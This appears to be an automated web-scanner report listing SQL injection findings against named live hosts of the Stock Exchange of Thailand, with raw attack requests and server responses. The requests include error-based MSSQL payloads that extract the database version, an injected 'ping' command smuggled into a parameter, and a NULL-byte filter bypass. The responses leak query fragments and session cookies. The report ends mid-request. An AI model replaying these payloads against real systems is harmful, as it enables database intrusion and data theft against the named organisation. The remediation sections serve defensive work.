XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05032011

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://register2.set.or.th/semreg/List.aspx [ow parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://register2.set.or.th
Path:	/semreg/List.aspx

Issue detail

The ow parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ow parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /semreg/List.aspx?ow=%22'& HTTP/1.1
Referer: http://register2.set.or.th/semreg/enroll.aspx?ow=//www.netsparker.com?&cs=S0001&sn=0049
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 15:26:17 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5036

<html>
<head>
<title>Line 1: Incorrect syntax near 'A'.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font
...[SNIP]...

Request 2

GET /semreg/List.aspx?ow=%22''& HTTP/1.1
Referer: http://register2.set.or.th/semreg/enroll.aspx?ow=//www.netsparker.com?&cs=S0001&sn=0049
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 15:26:19 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 4166

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>Registration Form</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="True" name="vs_sho
...[SNIP]...

1.2. http://register2.set.or.th/semreg/detail.aspx [cs parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://register2.set.or.th
Path:	/semreg/detail.aspx

Issue detail

The cs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cs parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /semreg/detail.aspx?ow='%2B%20convert(int,CHAR(95)%2bCHAR(33)%2bCHAR(64)%2b(SELECT%20@@VERSION)%2bCHAR(95)%2bCHAR(33)%2bCHAR(64))%20%2B'&cs=S0001'&sn=0049 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:23:05 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5061

<html>
<head>
<title>Line 1: Incorrect syntax near '0049'.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {f
...[SNIP]...

Request 2

GET /semreg/detail.aspx?ow='%2B%20convert(int,CHAR(95)%2bCHAR(33)%2bCHAR(64)%2b(SELECT%20@@VERSION)%2bCHAR(95)%2bCHAR(33)%2bCHAR(64))%20%2B'&cs=S0001''&sn=0049 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:23:11 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 6011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>detail</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="Microsoft Visual Studio .NET
...[SNIP]...

1.3. http://register2.set.or.th/semreg/detail.aspx [ow parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://register2.set.or.th
Path:	/semreg/detail.aspx

Issue detail

The ow parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the ow parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /semreg/detail.aspx?ow='%2B%20convert(int,CHAR(95)%2bCHAR(33)%2bCHAR(64)%2b(SELECT%20@@VERSION)%2bCHAR(95)%2bCHAR(33)%2bCHAR(64))%20%2B''&cs=S0001&sn=0049 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:21:38 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5066

<html>
<head>
<title>Line 1: Incorrect syntax near 'S0001'.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {
...[SNIP]...

1.4. http://register2.set.or.th/semreg/detail.aspx [ow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://register2.set.or.th
Path:	/semreg/detail.aspx

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /semreg/detail.aspx?ow=FKH'&cs=S0001&sn=0050 HTTP/1.1
Host: register2.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASP.NET_SessionId=2nr0a545weyfl4ivrwijkwi5; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:27:50 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5066

<html>
<head>
<title>Line 1: Incorrect syntax near 'S0001'.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {
...[SNIP]...

Request 2

GET /semreg/detail.aspx?ow=FKH''&cs=S0001&sn=0050 HTTP/1.1
Host: register2.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASP.NET_SessionId=2nr0a545weyfl4ivrwijkwi5; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:27:52 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5799

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>detail</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="Microsoft Visual Studio .NET
...[SNIP]...

1.5. http://register2.set.or.th/semreg/detail.aspx [sn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://register2.set.or.th
Path:	/semreg/detail.aspx

Issue detail

The sn parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sn parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /semreg/detail.aspx?ow='%2B%20convert(int,CHAR(95)%2bCHAR(33)%2bCHAR(64)%2b(SELECT%20@@VERSION)%2bCHAR(95)%2bCHAR(33)%2bCHAR(64))%20%2B'&cs=S0001&sn=0049' HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:25:10 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5181

<html>
<head>
<title>Unclosed quotation mark before the character string '0049' '.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color
...[SNIP]...

Request 2

GET /semreg/detail.aspx?ow='%2B%20convert(int,CHAR(95)%2bCHAR(33)%2bCHAR(64)%2b(SELECT%20@@VERSION)%2bCHAR(95)%2bCHAR(33)%2bCHAR(64))%20%2B'&cs=S0001&sn=0049'' HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:25:12 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 6011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>detail</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="Microsoft Visual Studio .NET
...[SNIP]...

1.6. http://register2.set.or.th/semreg/enroll.aspx [%20ping%20-n%2026%20127.0.0.1%20&&cs parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://register2.set.or.th
Path:	/semreg/enroll.aspx

Issue detail

The %20ping%20-n%2026%20127.0.0.1%20&&cs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the %20ping%20-n%2026%20127.0.0.1%20&&cs parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /semreg/enroll.aspx?ow=%22&%20ping%20-n%2026%20127.0.0.1%20&&cs=S0001'&sn=0049 HTTP/1.1
Referer: http://register2.set.or.th/semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 15:24:37 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5063

<html>
<head>
<title>Line 1: Incorrect syntax near '0049'.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {f
...[SNIP]...

Request 2

GET /semreg/enroll.aspx?ow=%22&%20ping%20-n%2026%20127.0.0.1%20&&cs=S0001''&sn=0049 HTTP/1.1
Referer: http://register2.set.or.th/semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 302 Found
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 15:24:38 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /semreg/List.aspx
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 134

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/semreg/List.aspx'>here</a>.</h2>
</body></html>

1.7. http://register2.set.or.th/semreg/enroll.aspx [cs parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://register2.set.or.th
Path:	/semreg/enroll.aspx

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /semreg/enroll.aspx?ow='%2B%20(select+convert(int,CHAR(95)%2bCHAR(33)%2bCHAR(64)%2b(SELECT%20@@VERSION)%2bCHAR(95)%2bCHAR(33)%2bCHAR(64))+FROM+syscolumns)%20%2B'&cs=S0001'&sn=0049 HTTP/1.1
Referer: http://register2.set.or.th/semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:25:16 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5063

<html>
<head>
<title>Line 1: Incorrect syntax near '0049'.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {f
...[SNIP]...

Request 2

GET /semreg/enroll.aspx?ow='%2B%20(select+convert(int,CHAR(95)%2bCHAR(33)%2bCHAR(64)%2b(SELECT%20@@VERSION)%2bCHAR(95)%2bCHAR(33)%2bCHAR(64))+FROM+syscolumns)%20%2B'&cs=S0001''&sn=0049 HTTP/1.1
Referer: http://register2.set.or.th/semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:25:19 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 6550

<html>
<head>
<title>Syntax error converting the nvarchar value '_!@Microsoft SQL Server 2000 - 8.00.760 (Intel X86)
Dec 17 2002 14:22:05
Copyright (c) 1988-2003 Microsoft Corporati
...[SNIP]...

1.8. http://register2.set.or.th/semreg/enroll.aspx [ow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://register2.set.or.th
Path:	/semreg/enroll.aspx

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /semreg/enroll.aspx?ow='%2B%20(select+convert(int,CHAR(95)%2bCHAR(33)%2bCHAR(64)%2b(SELECT%20@@VERSION)%2bCHAR(95)%2bCHAR(33)%2bCHAR(64))+FROM+syscolumns)%20%2B''&cs=S0001&sn=0049 HTTP/1.1
Referer: http://register2.set.or.th/semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:24:08 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5068

<html>
<head>
<title>Line 1: Incorrect syntax near 'S0001'.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {
...[SNIP]...

Request 2

GET /semreg/enroll.aspx?ow='%2B%20(select+convert(int,CHAR(95)%2bCHAR(33)%2bCHAR(64)%2b(SELECT%20@@VERSION)%2bCHAR(95)%2bCHAR(33)%2bCHAR(64))+FROM+syscolumns)%20%2B'''&cs=S0001&sn=0049 HTTP/1.1
Referer: http://register2.set.or.th/semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:24:35 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5580

<html>
<head>
<title>Syntax error converting the varchar value ''' to a column of data type int.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-si
...[SNIP]...

1.9. http://register2.set.or.th/semreg/enroll.aspx [ow parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://register2.set.or.th
Path:	/semreg/enroll.aspx

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /semreg/enroll.aspx?ow=%22'&%20ping%20-n%2026%20127.0.0.1%20&&cs=S0001&sn=0049 HTTP/1.1
Referer: http://register2.set.or.th/semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 15:23:36 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5068

<html>
<head>
<title>Line 1: Incorrect syntax near 'S0001'.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {
...[SNIP]...

1.10. http://register2.set.or.th/semreg/enroll.aspx [sn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://register2.set.or.th
Path:	/semreg/enroll.aspx

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /semreg/enroll.aspx?ow='%2B%20(select+convert(int,CHAR(95)%2bCHAR(33)%2bCHAR(64)%2b(SELECT%20@@VERSION)%2bCHAR(95)%2bCHAR(33)%2bCHAR(64))+FROM+syscolumns)%20%2B'&cs=S0001&sn=0049' HTTP/1.1
Referer: http://register2.set.or.th/semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:26:43 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5558

<html>
<head>
<title>Unclosed quotation mark before the character string '0049' AND GETDATE() >= SN.SXT_D_REG_ST AND GETDATE()-1 <= SN.SXT_D_REG_END '.</title>
<style>

...[SNIP]...

Request 2

GET /semreg/enroll.aspx?ow='%2B%20(select+convert(int,CHAR(95)%2bCHAR(33)%2bCHAR(64)%2b(SELECT%20@@VERSION)%2bCHAR(95)%2bCHAR(33)%2bCHAR(64))+FROM+syscolumns)%20%2B'&cs=S0001&sn=0049'' HTTP/1.1
Referer: http://register2.set.or.th/semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:26:49 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 6550

<html>
<head>
<title>Syntax error converting the nvarchar value '_!@Microsoft SQL Server 2000 - 8.00.760 (Intel X86)
Dec 17 2002 14:22:05
Copyright (c) 1988-2003 Microsoft Corporati
...[SNIP]...

1.11. http://www.set.or.th/chalard_orm/chalard_orm.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/chalard_orm/chalard_orm.html

Issue detail

Request 1

GET /chalard_orm/chalard_orm.html' HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=38

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:13:10 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 08:51:20 GMT
ETag: "498e9e-33cf-de27d200"
Accept-Ranges: bytes
Content-Length: 13263
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
<script language="javascript1.1"> page="Error 404";</script>
...[SNIP]...

Request 2

GET /chalard_orm/chalard_orm.html'' HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=38

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 15:13:11 GMT
Server: Apache
Content-Length: 228
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /chalard_orm/chalard_orm.html'' was not found on this
...[SNIP]...

1.12. http://www.set.or.th/en/products/bonds/bonds_p1.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/en/products/bonds/bonds_p1.html

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /en/products/bonds/bonds_p1.html%00' HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/contact/contact.html
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:15:55 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 09:21:14 GMT
ETag: "cd18c-33cf-49161680"
Accept-Ranges: bytes
Content-Length: 13263
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
<script language="javascript1.1"> page="Error 404";</script>
...[SNIP]...

Request 2

GET /en/products/bonds/bonds_p1.html%00'' HTTP/1.1
Host: www.set.or.th
